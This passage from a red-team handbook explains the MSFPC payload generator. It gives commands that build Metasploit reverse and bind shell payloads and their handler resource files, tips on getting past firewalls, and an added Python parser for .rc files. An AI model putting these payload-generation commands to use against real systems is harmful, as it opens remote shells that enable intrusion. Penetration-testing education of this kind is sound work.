Hands-On Red Team Tactics

Resource file

As explained in the documentation of Metasploit (https://metasploit.help.rapid7.com/docs/resource-scripts), resource scripts provide an easy way for you to automate repetitive tasks in Metasploit. Conceptually, they're just like batch scripts. They contain a set of commands that are automatically and sequentially executed when you load the script in Metasploit. You can create a resource script by chaining together a series of Metasploit console commands and by directly embedding Ruby to do things such as call APIs, interact with objects in the database, and iterate actions.

Let's check out the .rc file generated by MSFPC in the preceding command:

The payload is set to windows/shell/reverse_tcp when the CMD option is used.

The msf option generates the payload with a custom cross-platform shell that uses the full potential of Metasploit:

sh msfpc.sh msf windows en0

If you look at the .rc file generated from MSFPC when the msf option is used, you'll see the difference in the payload used by the payload handler:

The payload is set to windows/meterpreter/reverse_tcp when the MSF option is used. The resource file can be executed with msfconsole, using the following command:

msfconsole -q -r 'windows-meterpreter-staged-reverse-tcp-443-exe.rc'  

Where:

  • -q is used for quiet mode (suppresses the MSF banner)
  • -r is used for the resource file

Once the payload is executed, the stager requests the remaining parts of the payload from the payload handler. The handler sends these parts over and the complete staged payload is delivered to the victim:

Note: The payload we used in the preceding image is x86-based but the system is x64. It's recommended that the payload match the architecture of the operating system. In Metasploit we can either migrate from an x86-based process to an x64-based process, or use the post module post/windows/manage/archmigrate to migrate from x86 to x64.

  • BIND/REVERSE: The type of connection to be made once the payload is executed on the target system.
  • BIND: With this shell connection, the payload opens a port on the target server and the handler connects to it. Getting a BIND connection is very rare, as ingress (incoming) firewall rules usually block the port on the target server.
./msfpc.sh bind msf windows en0

The preceding command will generate a Windows meterpreter payload which, once executed, opens a port on the target server and listens for a bind connection from our payload handler. The port may not be reachable because of a firewall; in that situation we can opt for reverse shell payloads, which get through firewall rulesets that allow outgoing connections and connect back to our system.

Out of the two files generated by MSFPC, let's check out the .rc file for this:

The payload is set to windows/meterpreter/bind_tcp instead of reverse_tcp, which shows that the payload handler will use a BIND connection, connecting to the port opened on the target server.

  • REVERSE: This shell connection opens a port on the attacker machine. Once the payload is executed, the target server connects back to the attacker. A REVERSE connection is a very good way of bypassing ingress firewall blocks, but it can be blocked if egress (outbound) firewall rules are in place. By default, MSFPC generates the payload with a REVERSE shell connection.
  • STAGED/STAGELESS: The type of payload to be used.
  • STAGED: This payload type sends the payload in multiple stages, which makes it smaller in size, but it relies on Metasploit's payload handler to send the remaining parts to the target server. By default, MSFPC generates a staged payload.
  • STAGELESS: This is a complete payload and is more stable and reliable than a STAGED payload, but it is much larger than a STAGED one:
./msfpc.sh cmd stageless bind windows en0 

The preceding command will generate a stageless Windows executable payload. When executed, it opens a port on the target system and listens for a BIND connection that gives a standard Command Prompt:

Let's check the .rc file generated from the preceding command:

The payload is set to windows/shell_bind_tcp, which is a stageless payload. A staged payload in Metasploit would be windows/shell/bind_tcp.
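As an added example (not code from the book or from MSFPC), the following Python script pulls the set values out of a handler resource file and decodes the PAYLOAD name into the conventions described above: bind versus reverse, staged (shell/bind_tcp) versus stageless (shell_bind_tcp), and the transport. The sample .rc text and its addresses are constructed, and the decoder assumes the Windows payload naming used in this chapter.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout MSFPC writes; addresses are placeholders.
SAMPLE_RC = """\
# [Kali]: msfconsole -q -r 'windows-meterpreter-staged-reverse-tcp-443-exe.rc'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.0.2.10
set LPORT 443
run -j
"""

_ARCHES = {"x86", "x64"}  # assumption: only the arch tokens seen in this chapter


@dataclass
class PayloadInfo:
    platform: str
    arch: str
    stage: str        # meterpreter or shell
    staged: bool      # True for shell/bind_tcp, False for shell_bind_tcp
    direction: str    # bind or reverse
    transport: str    # tcp, http, https, ...


def parse_rc(text: str) -> dict:
    """Collect `set KEY VALUE` lines (keys upper-cased); nothing is executed."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"^\s*set\s+(\S+)\s+(.+?)\s*$", line)
        if m:
            settings[m.group(1).upper()] = m.group(2)
    return settings


def decode_payload(name: str) -> PayloadInfo:
    """Split a Metasploit payload path into its naming components."""
    parts = name.split("/")
    arch = parts[1] if len(parts) > 2 and parts[1] in _ARCHES else "x86"
    # Last part is `<dir>_<transport>` (staged) or `<stage>_<dir>_<transport>` (stageless).
    m = re.match(r"^(?:(?P<stage>\w+?)_)?(?P<dir>bind|reverse)_(?P<transport>\w+)$", parts[-1])
    if not m:
        raise ValueError(f"unrecognised payload name: {name}")
    if m.group("stage"):                       # e.g. shell_bind_tcp -> stageless
        stage, staged = m.group("stage"), False
    else:                                      # e.g. shell/bind_tcp -> staged
        stage, staged = parts[-2], True
    return PayloadInfo(parts[0], arch, stage, staged, m.group("dir"), m.group("transport"))
```

Running decode_payload(parse_rc(SAMPLE_RC)["PAYLOAD"]) reports an x86 staged meterpreter reverse TCP handler, which is exactly the mismatch the note on x86 versus x64 above warns about.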

  • TCP/HTTP/HTTPS/FIND_PORT: The communication method required by the payload to communicate with the payload handler.
  • TCP: This is the standard communication method once the payload is executed on the target server. It can be used with any payload type and payload format, but it is easily detected by an IDS and blocked by firewalls and an IPS because it is unencrypted.
  • HTTP: If this option is used, the payload communicates over HTTP on port 80 instead of an arbitrary TCP port. This can be used to get past firewalls when only port 80 is open on the target system. It can still be detected by an IDS and blocked by an IPS because it is unencrypted.
  • HTTPS: This option is used when generating a payload that will use SSL communication. It's recommended to use this option for stealthy reverse connections.
  • FIND_PORT: This option is used when we are unable to get reverse connections on the common ports (80, 443, 53, 21). If it is set, MSFPC generates a payload that tries every port from 1 to 65535 for communication.
  • BATCH/LOOP: MSFPC can generate multiple payloads (multiple OS platforms) with a single command. This can be achieved by using either the BATCH Mode or LOOP Mode.
  • BATCH Mode: In the BATCH mode, MSFPC can generate multiple payloads with as many combinations of payload type as possible:
    ./msfpc batch windows en0  

MSFPC generates all payload combinations for Windows only (as specified in the options), with their respective resource files (.rc):

  • LOOP Mode: This mode generates multiple payloads of all types; MSFPC can generate all the payloads for a given LHOST. This is useful in an environment where we don't know the target platform's OS exactly. The payloads can be generated with the following command:
./msfpc.sh loop 192.168.10.122 

MSFPC generates payloads with DEFAULT values for all payload types, with their respective resource files (.rc):

  • VERBOSE: This option is used if you want to get more information on what values are used by MSFPC while generating a payload:
    ./msfpc.sh loop 192.168.10.122 8080 verbose 

In this case, LOOP mode is used to generate payloads with LPORT set to 8080.

The tool's features are updated and maintained in its repository. It's highly recommended to check online for tool updates every two weeks.